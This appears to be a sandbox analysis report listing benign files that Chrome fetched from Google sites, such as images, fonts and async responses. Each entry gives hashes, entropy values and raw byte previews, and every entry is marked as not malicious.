                                                                                                                                                                                                                                                                                          URL:"https://www.google.com/async/hpba?vet=10ahUKEwiPz-fGreOIAxUsSfEDHZ8eAfMQj-0KCBU..i&ei=CsT2Zo-iIaySxc8Pn72EmA8&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.dIEp8Iy3TZo.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.8JyeNrzotDo.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAAEAAAAAAAAAAoAHYSAACMAAA2ACAAAAAAAAQAAAMAAAAAAEACAAAABMACAAAAAAAEACASAABAEQAAAACBECAAAAEUQAgQgAQIFEEoBAAAAAYAAAgBYIBhAIIKAEYBAgAAAAAAIEAEAAAARQACBADoIRAABgJhAgAgBPQABAAAAIAAAAJAAAAYAANkAAIAAAAAAADIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAQAEAAAAAAAAAAAAAAAAAAAAE%2Fbr%3D1%2Frs%3DACT90oGeXue4vCo29BBNLxd3Hctkci5Jig,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.dIEp8Iy3TZo.es5.O%2Fck%3Dxjs.hd.8JyeNrzotDo.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAAEAAAAAAAAIAoQHcSAACMAgA2ACAAAAAAAAQAAAMAAgQBAEQCAAACBOACACAQAAAFACISAABBE4BHmQCBESBMAAEUQAgQgAQIFEEoRAAAAAYAAAgBYIBhAIIKAEYBAgAAAAAAIEAEAEAAxQACBADoIRAABgJhAgAgBPQABAAAAIAAgAJAAAEaAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oEgYxAnltOQ2uX96jprRQET-kPdwg,_fmt:prog,_id:_CsT2Zo-iIaySxc8Pn72EmA8_8"
                                                                                                                                                                                                                                                                                          Preview:)]}'.21;["EsT2Zs6QKKfgi-gPqvOKCA","2085"]c;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):7450
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9466762875405195
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:v0ydeyEkZzc5EEttyNPp0BorRpMlx8tfRKJRVM1oc:vtEtNGC2rM6KJM1oc
                                                                                                                                                                                                                                                                                          MD5:68B6198D96D08CD134A08B067984494A
                                                                                                                                                                                                                                                                                          SHA1:8A7702B58E6DD86B86318160C128A5236EFB2BBD
                                                                                                                                                                                                                                                                                          SHA-256:6CA243D51F626351B5ADC276A4030B9AE05127C54EE8FDD850AC4D86BFC559E9
                                                                                                                                                                                                                                                                                          SHA-512:41017D4918BA9CC878C9750F9280350D6A88BB12969EFCBA71343D4A3B2176D7B03C5943DC4C4D5451F2F7C8438C3B456ED451BD15A38DB530EB5CDA81EA870E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/ra4Ks1fsGsLSlzWoAU-9Ls2V5vEFCsA9thbtIkCHNFYeLC-ver57N4-GCGFZ-GBGw6uQkYPkvobF7dzM7udYmcTs4wfDTljzskEZAQ=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..yp..y...s......A..@....d..H..I.l."...:U{..d..7Y'..v.[N......,9.....DY.,R.%R..&q..H. .. 8..........`...Ii~US.jt.{._..........'O.<y...'O.<y...s% \....I..@+..,......x.....&~.....4.../..W~.|a.,I..`.....j.......?' &~.:..q.A.0..&.a...!.O...<...B.X..v.n`;.!.B..j'Q.aO...=..dY~..r.../`I...........e.8FK.....[Y.O...\..N..?....f....'..~E...E..w.z.;...,I.../....o.R.4RE:..R?.A...&......GY.....;.".,I.......:......*.N.........P]]..*JKK)........... ..D#.&''........FF...arr.h4J$.!... .".(....>....e9......k.'....}.....:.."..>...2.,YB}}=MMM457.d..DQD....4]..B.A0Z,088..'.........p..y.^....8..LZ.....>Y...x.....$I..}.......4.UU)**.........i.......iF..E.I.E.A@.E4M..........'?...Nq..EDQ....0....,.C....\v..$..l.h...;OUUTU.......Z[[........i...\.......r..Q.........P&.~......j...%I..~.c.j.:G.4".0..........v.~?..f]..0.}..y...8.(.:x...q....G1t...<nw....K..........4t]'..P..m.6V.XA[[.E>...f<..6. .p8.........n...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1280 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1527289
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985866300066576
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:z3YNMeVTLioUPvutg33W3nrAuj0jzLjfyhphHtdRj/BY2QWdpkQ/eVCHQ6ibBojH:0pTGoUPv3WoLcppf1B5Zpj2GvuBoF5rb
                                                                                                                                                                                                                                                                                          MD5:1C08A01BED696941B735B5CCFA98B463
                                                                                                                                                                                                                                                                                          SHA1:C4EA46C64E220E556F67F61944D16D9DA3E9BA64
                                                                                                                                                                                                                                                                                          SHA-256:06F943530528D65ECD7BBAECE3F513B533EC0676C7906BBDB8EE8D810D207CBB
                                                                                                                                                                                                                                                                                          SHA-512:6A2A4392191BAAE8918A86E85CE1F819D480881F9E06430A5C1B99265816FA8BC73C169FD55E3FA85C1A49C87A16CB640E72A60794607B9FCDCE709FD9578755
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/3l1m7o0VIsYE1DJXDVlhGMrvGxSzjpczwa5DMARfvEvJe9bV_Hhbdq8GeB4ewqPdPaYDNHxQfarVm_w13BRIOryoo0sTffYinVmjnA=w2000
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............}.V....sRGB.........eXIfMM.*.............................b...........j.(...........1.....%...r.2...........i.................H.......H....Adobe After Effects 2020 (Macintosh)..2022:09:08 17:20:50......................................................2022:09:08 17:20:50....v....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:exif="http://ns.adobe.com/exif/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/">. <exif:ColorSpace>65535</exif:ColorSpace>. <
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 240x240, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10176
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.982018441057502
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:oq0moJUV7UzrRoVS/1wkcF7Ptg3DrsP2szge7GtPnq5meXnvqatm:o3fUWzWVSKp12szge7GxnSm5
                                                                                                                                                                                                                                                                                          MD5:97CC8E86C2752835CEFBF9A1BFA03252
                                                                                                                                                                                                                                                                                          SHA1:BD087F67E577165F9470A25ECCDABC4A17EFBE6B
                                                                                                                                                                                                                                                                                          SHA-256:DA26729FFD4122E2B4CBC3C764621DCBC9791C7D51CD3EDBF277DDBD14116078
                                                                                                                                                                                                                                                                                          SHA-512:B172DD8FF5387BBD2629BFE0DA9947151B52362148B6B5557653D39D40021633BB9C167ADA375ADC9C233CEE40C6E9F62706A535216009341A32AB8948CA6EA8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF.'..WEBPVP8 .'......*....>U$.F#..!%..`p..cl.s....Q.......WrO../....k....{.....zl....'.7.7h....xO...*e..mK>q....{x...R....s..?,.8.#.........z_~..3~.. ..@N$..}1<..s.......3&.....p_..k_q..h/p..e.%Br..3.e.K4.........^..p..c...l.)x.N..a%....j.2.VF.l...?{...Kt.X....)s..V.@=...M.U^.\Yf!xn.'/N....U<.#.wC+..|`..*.pz.B[dJ.T..9.'..YB"M..5.Y..........K.J.......Z.A.#...._..............#o4..Qj.|..Yr.R.yF.....M..L..y>Hb.&j...q!'k.....C....:......k....4&....Z..Q..f&/...[)...F.g0...I..(...P...M....:..(.....C~h.=o,z$?.Q?............x.j..o..Y.9..~..Q..{.~..C...3.T..J.p|...c.4.OTX3z.G.'-.4&...:..&aq..|../LW4..mp.O.#.....',y.....RzQ.%.|V.:.Bq>n.F.F....F..@.z.>Fb`:.........`Uq.LD.....6...-...^..>nv...z...I.G..f.".jK.W..".#?B...'..U.o..MEA...r.kq.,.b....R.......c...<?(.Ez,.q.d\.l../..s.....t.\.>.{..bt.../..X\j9.h.v.....$.7.y..=p...1.uM?.YC.6.Q..g....E.V@.N.5'"..c5b.....Z.@.F..^..*cF.Y. ..6-.K.A.....Q..T...L.l...V..}.!..@J.......a......J..92Y....?x+.!.x.$...)
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):398264
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.825868203640533
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:g+8tcJnW7o4atIaKozdbA4pQcYu/rvqwXTEPz1Jvrch1BrE1dzCmrW:g5EnW7o4atIHo9ATruTvqQg7vcrWC
                                                                                                                                                                                                                                                                                          MD5:4D91CA67646C19DA465C89B5AE5374D3
                                                                                                                                                                                                                                                                                          SHA1:F16ED92525A0083A270797D948FA8234EC7A6EA1
                                                                                                                                                                                                                                                                                          SHA-256:C85ACC2D7CE84C9853ABFEA0A4CBE7323E067CC274CCE6A3FB4EFAF279B2E3BF
                                                                                                                                                                                                                                                                                          SHA-512:03A4B5AB1AC721D0874FD4BD381144B7D7DB71F4E81B4B3CF6FDA59924D0D7C12923CA417A6F64E98E4719CEB5546987616E4EA19849304C69F141EC287F922F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/2noIz2X2ov5fXwxhW8AbSDnLpp8tT3mI3-iV_OQ2UOwX_EhIBBgip7FPRs10DYmPKinVM98Qkjr1uN3BhQ3StGXCp1-O_wPwoLZeDQ=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..D..u!...2..M..w..K......^.C..^...d8g.S.UP|....>.m#.~.pf.D.@.XH...p.....O..Ru.(mR.0W.....|.N.[.]n..j..?.s.@o.tu..=..O...#o9...>).Jk....VF.I..%.....~..g.....`H...*..............`.....`...{..}.{_......v:..X0aH..3..~.....9.t.?..9...N.l...6..v.p.....b.f....vo..'.sN..YTa.k.........K:-.:...'Z.mo#g..7v...JD.r....p...r.s...Y,.Y.r..I9{$.i*T...z..>].MUw.Rh.......yj.~e..m..eLP.....:;.[...}.q....#....R....z.....:X(A.......`.O......*..Ab$I.$yV.3...t..H..I..}._.c...Sk.m.m.......P..........>...o..ki.....}.Kx.........S_..9{R@.7..m{6...8...'Uu....F...d...g.+.....I...l#....:..z.}_.y..........$I.m.e.Y.Z.c.9.Z..cff...>23....k..{oU..I.$I.mK".5_{.{#".r...f.QG...9{-w..X.mUm^...s.7.....m.nc.*..1..@'/...oo.....'..x.7...!/..s..[I.D...I.../.UK..k.....U3sHf..d....A......s..$.k.U...\k..............Z\...k..r..d.....ED.}.*..1................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 52280, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):52280
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.995413196679271
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:1rvqtK8DZilXxwJ8mMwAZy7phqsFLdG3B4d:xytBZits8bw4wzbFxG3B4d
                                                                                                                                                                                                                                                                                          MD5:F61F0D4D0F968D5BBA39A84C76277E1A
                                                                                                                                                                                                                                                                                          SHA1:AA3693EA140ECA418B4B2A30F6A68F6F43B4BEB2
                                                                                                                                                                                                                                                                                          SHA-256:57147F08949ABABE7DEEF611435AE418475A693E3823769A25C2A39B6EAD9CCC
                                                                                                                                                                                                                                                                                          SHA-512:6C3BD90F709BCF9151C9ED9FFEA55C4F6883E7FDA2A4E26BF018C83FE1CFBE4F4AA0DB080D6D024070D53B2257472C399C8AC44EEFD38B9445640EFA85D5C487
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2.......8.....................................^...$..4?HVAR..?MVAR9.`?STAT.*',..J/.......`..(..Z.0..R.6.$.... .....K..[..q..c..T.....>.P.j.`.w..#...%......N.".....$..3.0.6......... .L.rX/r[j.y.|*(.4.%#.....2.v.m..-..%.....;-.Y.{..&..O=#l@...k..7g..ZI...#.Z./+T..r7...M..3).Z%.x....s..sL..[A!.5*1w'/.8V..2Z..%.X.h.o.).]..9..Q`.$.....7..kZ.~O........d..g.n.d.Rw+&....Cz..uy#..fz,(.J....v.%..`..9.....h...?O..:...c%.....6s....xl..#...5..._......1.>.)"U.4 W....?%......6//!$...!.n9C@n...........!""^.....W..Z<.7.x.."UT.T....E.."R>.R..t.....H d..e_.K../.+8.Q.P.ZQ....;...U....]......._.e*......71.?.7.ORv.?...l...G|.P...|:...I.X..2.,.L........d.g.]}W#uW]QnuP-s.;.-Y.....].......C..j_.M0...y.......J..........NY..@A...,....-.F......'..w./j5g.vUS...U..0.&...y7.LP.....%.....Y......Y..D. e.A..G.?.$.......6...eaK.n5.m...N...,...+BCl..L> .E9~.b[.w.x....6<...}.e...%V....O.......*.?...a..#[eE.4..p..$...].....%......o._......N.._~..El....b..A.0.r8.....|..D.d..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15996, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):15996
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.989012096227512
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:nH4UArsQ/nHYjtuHgovTC+H+b23+kMw/KjK0TQ59u98pgQXk:nYZQjtuHgYGbrMyjDiJXk
                                                                                                                                                                                                                                                                                          MD5:CC536892EABDE0EAEB81493BDA8E189A
                                                                                                                                                                                                                                                                                          SHA1:15C0180AD7BDF9D0F963747447BC9446FC42D2DC
                                                                                                                                                                                                                                                                                          SHA-256:97399A2914C593DA2895D9729AA0170A1956E91EE54CF7550696691949558A37
                                                                                                                                                                                                                                                                                          SHA-512:94F605C4C4FE76EBDB2D5428C6BA69F83B75C65B6932251C0C3E90F92CC1F421FD9F15E81D5985693DC564B8644D90A26DA3E9C63976CF5862ED54D5ED0C4320
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEp2iw.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......>|..........>...........................<..:..:.`..:.....p..~.....6.$..(. ..>..N.....5xn.u..b.....c..<..Rw.H..q.(.....9A...^.=h.%J...4.\.\.[....[....h.j..AP.....a..]N.o....6.a..uO..R.|o...wO..t....s....^F...Oy....IN^..X...9sg...(;..L.....5.s~...?....%.0.f....b.. ..;.. "k+.v`.....1kq.\mqLp.]|..Z\..O......=.......h..,u.................y.h.o.Z..%.....g#..B......V...3.r....J..>g.-rU?+.3A.....C...... .21..f...Z.......P..o..g\.b... v...6..0...b.....?..-WL...Z2...1..Q./....... ..C..G.^r....O......io;.o..4.<....7.Pm..!.Nu.=..Oc............e.w.g.....,...c...0V.P...R.){..u...>*.fi..S.w.G...-..... $.8......w..hp...T@..Go....).......;.....B.)..p.\.?.-KC.S.5..pX9...'.!.-....R.Sg.>x.o.yP......S....a...m<.+".t%..3x.?3M;....k.....I&I.3g.26...p...}~....X.x..G.<)..k..U....AZ..A@....Cu..Tv{...|v.04H.$Xc..E.)<...!........^..~.7P.u...xH..rX..8O....y.k(...0.p 0.%.U...*Z...%...|LlUJ.]L_...9..AX.$E.$.sa.(v8L!...rc.-....I..W..........^U...@.....3P............M..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5188
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.952928145135762
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:9JKglioE6pMcO5oiXZuh+u/U7pLnZ0jnn7dwp5KRf0271XM8zAJPzSjCWdJ28/p2:9J66pTOlI+u/U7pLnZ0jn7dwuRfU8zAd
                                                                                                                                                                                                                                                                                          MD5:714ACF1F5A07C6204BBD7E59194A2870
                                                                                                                                                                                                                                                                                          SHA1:3F8170F84AA88CC81D56C4383CF3758E7945D71F
                                                                                                                                                                                                                                                                                          SHA-256:1C58D90328C77231DAAA4F46073F3BADE862DB0E24A896F1B17912BB52C0FDDA
                                                                                                                                                                                                                                                                                          SHA-512:FE1D52B327E09B1936B156546DF09F10802ED8D51C474217F4E02FFB8C312F519540136833C5E51A07CC7E25A748F2DECAC7D393885BF4AF05A53CB9C52465B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..y.T..?..^Uuu7.44;..K..n.Mp.4..Fe.......dr.1.....%.q"q..h......3!.9..M7.`\..l..&.MwUW...?Z<4T5U.....>.p..{..~.}........(P O.\;.)v\.....KP..)....Z.b........b-b<..W$f ..A$b.r....~.L.e...2.;b{[..#eFt0*.A...P...2T.#...U-..E...h=p@.N............/.}.+.....v..%.GS..2.....*.A.lE.B....Q.Aw!...g..5...[CM...k6x.6..y/...'.....a.@......m..ETv"l.j.....}W.~.]O.#/..u.XW\g..~.1.LPaX~9....V.Z./...U..\{u4y...~..X<../.0.t.H(.~..*V.7....U...6......WH]... .-P..$O|K......{z.s..z.......&L..7..$..\..!v...*...^.J....._<..9...3....\.....DY.h2..\[..b;'..]8.r.s?.A@ .>d....S...U...6.U.w.3,....Q.3.(..<.....+k.).F.&..*.3...0"[6...5.fz....d.\V...s.c^.d..@8W..z....c.G.|~\YK...9o......c&r.....~....:...{..%y...O.O....}..~.p3.`dLo9.g..U.F... 8.^.gj._.a"...}e..ll:....h...m.....q.g.2.d*..I.K.5.p. ...m...e!...|E..~..X+.@.....>[..8(.>.wy.A?MeD.=S...N....A...k.-_^].N.....eq.PsIA..X.....|yuC6Lv....X.HA...|..._...P..vJ....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):102
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.168187299251515
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:VG4cNx6wrS4JUkDZHG6JElJWdHZ+4LQpNYe:VpcNov4TLJkWdHAHpue
                                                                                                                                                                                                                                                                                          MD5:1E203DCBA3CCEA0B8C56AF74AC04A3E4
                                                                                                                                                                                                                                                                                          SHA1:18C8A609A4F1935CC3363F6F23BD9B826A0D0492
                                                                                                                                                                                                                                                                                          SHA-256:1B73936B486072866D998628ECEAF16290527E47D4C52A9B1EC93BFAF4807E55
                                                                                                                                                                                                                                                                                          SHA-512:64895435D6E9E9612E1E1C30CF82488DDFBFFF885189ABAED41783DAB03DB73E9AC982342C24F2617BAA100E7AD4E7721F2574DCE8F9F822CB9180B02F3DA025
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:)]}'.22;["E8T2ZpTvIZG6i-gPvb-quQU","2085"]c;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2402x1596, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):157178
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998930050760275
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:g2ci6ceYR3knxO8LV/vRvsfDWq/ScjeHxdO1XQOzwKmUXTnVO5eP1Ia/2pI0c:g2ctcPR3knxD/IWq/TibOFQORljnPP1v
                                                                                                                                                                                                                                                                                          MD5:CB6ED3B51519A2BCC3D7BC6DC208CADA
                                                                                                                                                                                                                                                                                          SHA1:4948E60261CA116C47C15DC4A695561C4CED043C
                                                                                                                                                                                                                                                                                          SHA-256:2714335D83198B49EFA35C792553D5075BBE51775543FEB06C5400865B5AB9F2
                                                                                                                                                                                                                                                                                          SHA-512:BE6D420EC4456EB1360E60380C7796899F89F5220E9A7E7E114BBB4154FBC6A03180546000042C9E05A0ED80499EC056637C9FBDC4A6237CE5DCDC7C15008546
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/04/8b/1761c2394ce897b65bb71f0a8215/b5etx6veze6zkfo.webp
                                                                                                                                                                                                                                                                                          Preview:RIFF.e..WEBPVP8 .e...V...*b.<.>m6.H.#0*#2."...gn..rJ.~..[.s...w..../M....3.....K.^,.....7:..........*~...<.:\.r._.np.DE?.v..K.|9...?......Wo.......>......".....k.......^......`.......?.+.....?......r=)|..?....&=7........O.......9....<..m...?....i...-G.2...G.7~G......w..:..y.~..[.?.w...=&}..1..'t....t...6.W)l8.6........C.@.;s=....*C.....N....o...<.2.k,.e.t.HZl..d.....P.[...?...++...).4vo..o.\].Q....+.2Tp...Q]fDln.Y..O....f..,.3.U....v1g.A.E...\...S.aW).R}../T.N>..*.+.V.Q.Z..7Y........./..!.5-.&....++.....yR/.-..~2...|...G..#.......r..@J^..A.5.....{.^Cz....mz.N....D...<..w)`..vZ.Y.b...N..h....O...%Z}J.....#.`....)@.0..TD0._..k[.d...$.....].q....0W.Q3;Ht}..6.]..r,.w(=d...G%s..-..........4h.~.>.?&?}q....(j ..u.~3M ....B.....3@..'~.q.B.......!....u.0a!....3m..'s?J8vB.k..n..OAq..!5..g..o...,s....,...E.M..KH..&.R...o`Y.....>...K...+Z....A...Y`k..........."..W....}.F.s.....[Y.%....Pq.7..&..f.<..?....u.t.{&G.M*..pEJg..7./..Z.m'LC....*`.2...Y...........2.....Ru...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 1388
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):637
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.650386954014402
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XlK5YwiLvnKD4x8ORizwU8xv6nQyxCnk0M2oE3UG2VBadRp+kChFqyNSLFMg:XlO8u4x8Ei8UOv2QyxqmmUG2VmD+kCLW
                                                                                                                                                                                                                                                                                          MD5:5B1CB0EFFDF557F357F0E43E4F8D182F
                                                                                                                                                                                                                                                                                          SHA1:E7A3327962C67C0D7C6567C664841BF74581BDCA
                                                                                                                                                                                                                                                                                          SHA-256:84F419BCCEBCE3DBA3BC0D9D5128E0F11DB06DC47782EEB1929DF5478A0D3684
                                                                                                                                                                                                                                                                                          SHA-512:B5263F70FD27611B023659EABBD2F6DCBACF2A22043911ACBB42E7A073A837C3C8EC8F131B1BDB28A63CC624FF130AECD0A61D10D36484DA93457997F1857DFE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/images/icons/cta-arrow-right.svg
                                                                                                                                                                                                                                                                                          Preview:..........|.Ks.0.....[.......3..f:.\.......0&.......&vt0....jW8.;<..7u.WeB8e.L....$...onD.fWq..@..6.hw ..|.Y.tg.s.~...a..G.5..A9..)..d..n=.m[.JZ..O0.<..).."/.......dv........4..V.-..... ....+....b..M.....\w....f....Kk.rU,P{..4......{..`j..l^..5)..f.&..>t..@.&..[[..4...&!eU..r.^.x.b.v{.~)0..MY..p...Gnm.....1...We.T......v.r....r..\..u3.}...M.....z...]J}b...B7.Xox..O........:.t..&.s..7}+.j/...s@.t.U:j....... ..gh.{=...g.[.......s.2..P<B.9>.....5...0g.....Hp..l.OD.:..L.9.T+.*.M..p.....(N.d.e..~...s...d.........:.m.}!....X%:.."......eET)..L_.:Oh<.`....2P_..-....{...Wu>.Y.u.>...ix....\...?...7q..7........$.)sl...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1440x772, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):106644
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.947771294434123
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:wqVDfgrCHLKB6h/Lq9MEmWvA/ob0qlEtkukF:BVDlHLokjCMEl4/ob0qlGW
                                                                                                                                                                                                                                                                                          MD5:ECF6C109BC1E02928D4DDE8F700C9F8F
                                                                                                                                                                                                                                                                                          SHA1:01DB474425DE334C83E268E061DFA70E8C8774E0
                                                                                                                                                                                                                                                                                          SHA-256:DFAF21D1A424D8F1549A20E55279335AD9EB00A2F28C34B2CDCF789320AD86D2
                                                                                                                                                                                                                                                                                          SHA-512:E1CDFD5E88B87BCDD0D36CBB476D59764B7E42EE7610D549DC638F3E15D1F95A4E9F519603A304BE91CACC87B421DF50013CAC4E786CB3C65B8B129DFACB375C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/0d/b7/7a270163446e8ba419aac246f4e2/bgimg-travel-3.jpg
